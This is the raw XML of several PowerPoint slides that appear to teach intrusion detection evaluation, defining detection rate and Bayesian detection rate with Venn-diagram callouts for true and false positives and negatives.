                <a:gd name="adj1" fmla="val 20661"/>
                <a:gd name="adj2" fmla="val 106396"/>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False Negative</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>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388" y="2137128"/>
              <a:ext cx="927100" cy="241300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2980488" y="4419600"/>
            <a:ext cx="2793218" cy="934948"/>
            <a:chOff x="2980488" y="4419600"/>
            <a:chExt cx="2793218" cy="934948"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rounded Rectangular Callout 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2980488" y="4419600"/>
              <a:ext cx="2793218" cy="934948"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 7526"/>
                <a:gd name="adj2" fmla="val -136600"/>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True Positive</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>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1497" y="4945239"/>
              <a:ext cx="711200" cy="241300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5565580" y="5473653"/>
            <a:ext cx="2793218" cy="934948"/>
            <a:chOff x="5565580" y="5473653"/>
            <a:chExt cx="2793218" cy="934948"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Rounded Rectangular Callout 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5565580" y="5473653"/>
              <a:ext cx="2793218" cy="934948"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 7526"/>
                <a:gd name="adj2" fmla="val -136600"/>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True Negative</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="Picture 2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3389" y="5992989"/>
              <a:ext cx="1117600" cy="317500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411199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64</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8382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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2892230" y="2819400"/>
            <a:ext cx="3359541" cy="1409700"/>
            <a:chOff x="2209800" y="2819400"/>
            <a:chExt cx="3359541" cy="1409700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="Oval 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2209800" y="2819400"/>
              <a:ext cx="2209800" cy="1409700"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent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r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>I</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Oval 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3269859" y="2819400"/>
              <a:ext cx="2299482" cy="1409700"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln/>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent3"/>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:schemeClr val="lt1"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent3"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="dk1"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Oval 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3952289" y="2950246"/>
            <a:ext cx="1143976" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="69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nchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2743201" y="4876800"/>
            <a:ext cx="3508570" cy="1295400"/>
            <a:chOff x="2743201" y="4419600"/>
            <a:chExt cx="3508570" cy="1295400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Rounded Rectangular Callout 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2743201" y="4419600"/>
              <a:ext cx="3508570" cy="1295400"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 6218"/>
                <a:gd name="adj2" fmla="val -131420"/>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45720" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">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Detection rate</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture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036" y="4959330"/>
              <a:ext cx="2628900" cy="736600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="609600"/>
            <a:ext cx="6422852" cy="1384995"/>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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Think of the detection rate as the set of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>intrusions raising an alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> normalized by </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>intrusions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2848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65</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81534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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3650859" y="3009900"/>
            <a:ext cx="3359541" cy="1409700"/>
            <a:chOff x="2209800" y="2819400"/>
            <a:chExt cx="3359541" cy="1409700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="Oval 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2209800" y="2819400"/>
              <a:ext cx="2209800" cy="1409700"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">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r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>I</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Oval 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3269859" y="2819400"/>
              <a:ext cx="2299482" cy="1409700"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln/>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent3"/>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:schemeClr val="lt1"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent3"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="dk1"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Oval 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4710918" y="3140746"/>
            <a:ext cx="1143976" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="69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nchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rounded Rectangular Callout 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="2024239"/>
            <a:ext cx="983859" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -28079"/>
              <a:gd name="adj2" fmla="val 194444"/>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18</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rounded Rectangular Callout 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="1871839"/>
            <a:ext cx="983859" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -28079"/>
              <a:gd name="adj2" fmla="val 194444"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangular Callout 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="2835946"/>
            <a:ext cx="983859" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 131124"/>
              <a:gd name="adj2" fmla="val 50926"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1447800" y="5105400"/>
            <a:ext cx="6324600" cy="914400"/>
            <a:chOff x="1447800" y="5105400"/>
            <a:chExt cx="6324600" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rounded Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1447800" y="5105400"/>
              <a:ext cx="6324600" cy="914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pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="Picture 2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5240867"/>
              <a:ext cx="5562600" cy="609600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>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793534"/>
            <a:ext cx="3302000" cy="1587500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16612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66</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7620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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2892230" y="2819400"/>
            <a:ext cx="3359541" cy="1409700"/>
            <a:chOff x="2209800" y="2819400"/>
            <a:chExt cx="3359541" cy="1409700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="Oval 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2209800" y="2819400"/>
              <a:ext cx="2209800" cy="1409700"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">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r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>I</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Oval 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3269859" y="2819400"/>
              <a:ext cx="2299482" cy="1409700"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent3">
                <a:alpha val="61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nchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Oval 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3952289" y="2950246"/>
            <a:ext cx="1143976" cy="1143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nchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="609600"/>
            <a:ext cx="6801862" cy="1815882"/>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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Think of the Bayesian detection rate as the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>intrusions raising an alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> normalized </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alerts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>. (vs. detection rate</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>which normalizes on intrusions.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="762000" y="4724400"/>
            <a:ext cx="4267199" cy="1295400"/>
            <a:chOff x="2743200" y="4876800"/>
            <a:chExt cx="4267199" cy="1295400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Rounded Rectangular Callout 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2743200" y="4876800"/>
              <a:ext cx="4267199" cy="1295400"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 34658"/>
                <a:gd name="adj2" fmla="val -133599"/>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45720" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Defn</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Bayesian</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> Detection rate</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRP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349" y="5403144"/>
              <a:ext cx="2628900" cy="736600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5867400" y="4930599"/>
            <a:ext cx="2286000" cy="1107996"/>
            <a:chOff x="5867400" y="4930599"/>
            <a:chExt cx="2286000" cy="1107996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rounded Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5867400" y="5029200"/>
              <a:ext cx="2286000" cy="958144"/>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rtlCol="0" anchor="ctr" anchorCtr="1">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Crux of IDS usefulness</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5990775" y="4930599"/>
              <a:ext cx="309279" cy="1107996"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="7200" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>!</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="6000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
